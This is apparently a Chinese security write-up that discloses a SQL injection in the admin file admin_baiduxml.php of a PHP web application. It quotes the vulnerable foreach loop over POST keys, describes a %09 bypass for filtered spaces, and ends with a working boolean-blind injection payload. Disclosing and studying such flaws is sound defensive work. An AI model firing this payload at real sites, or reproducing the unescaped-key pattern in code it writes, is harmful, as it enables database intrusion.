注入存在于后台 admin_baiduxml.php

代码 52-63行

elseif($act == 'setsave')

{

        $_POST['xmlmax']=intval($_POST['xmlmax']);

        $_POST['xmlpagesize']=intval($_POST['xmlpagesize'])==0?1:intval($_POST['xmlpagesize']);

        foreach($_POST as $k => $v)

        {

        !$db->query("UPDATE ".table('baiduxml')." SET value='{$v}' WHERE name='{$k}'")?adminmsg('保存失败', 1):"";

        }

        refresh_cache('baiduxml');

        adminmsg("保存成功!",2);

}

这里可以看到 用了 foreach 对 $POST 进行遍历,没有对$k 进行处理

!$db->query("UPDATE ".table('baiduxml')." SET value='{$v}' WHERE name='{$k}'")?adminmsg('保存失败', 1):"";

虽然上面两行对 xmlmax 和 xmlpagesize进行了 intval操作,但是用户可以提交如下数据 那么这里b参数就没有进行任何处理导致注入

xmlmax=111&xmlpagesize=112&b=aaa

空格变为了_

可以用%09 代替 空格

最后bool盲注 payload:

xmlmax=111&xmlpagesize=112&b'or%09if(1%3d(select%091%09REGEXP%09if(1%3d12,1,0x00)),1,1)%23=aaa

最新文章

  1. 使用Node.JS访问Hyperledger Fabric的gRPC服务
  2. 获取MAC地址的几种方式
  3. DBAccess
  4. 02 Linux 下安装JDK并测试开发“Hello World!”
  5. WPF好看的进度条实现浅谈(效果有点类似VS2012安装界面)
  6. 解决xubuntu的thunar第一次启动慢
  7. graph-tool文档(一)- 快速开始使用Graph-tool - 1.创建和操纵图
  8. Xamarin.Android 入门之:Listview和adapter
  9. bnuoj 1053 EASY Problem (计算几何)
  10. C#日期时间格式化
  11. CentOS 7.0 安装 python3.X 脚本
  12. spring mvc 全局异常处理
  13. 定义block块
  14. new关键字的理解-问题型
  15. ubuntu系统普通用户sudo命令执行报错解决方案
  16. React+webpack-Module Parse failed, Unexpected Character ‘ ’
  17. HDU-problem-1002-人类史上最大最好的希望事件-矩阵快速幂
  18. Orleans学习总结(一)--入门认识
  19. 2.5 C++类class和结构体struct区别
  20. IIS下使用 HTTP/2

热门文章

  1. Vue2中父子组件通信的几种常用方法
  2. i春秋-Phone number(union注入+hex转码)
  3. Java线程基础及多线程的实现
  4. 【LeetCode】316. 去除重复字母
  5. Linux 中的虚拟网络接口
  6. rancherUI添加configmap
  7. Semi-automation Script Based on Sleep
  8. Easylogging++的使用及扩展
  9. spring boot 整合JPA bean注入失败
  10. C# 二维数组 [,]与[][] 的区别 及特性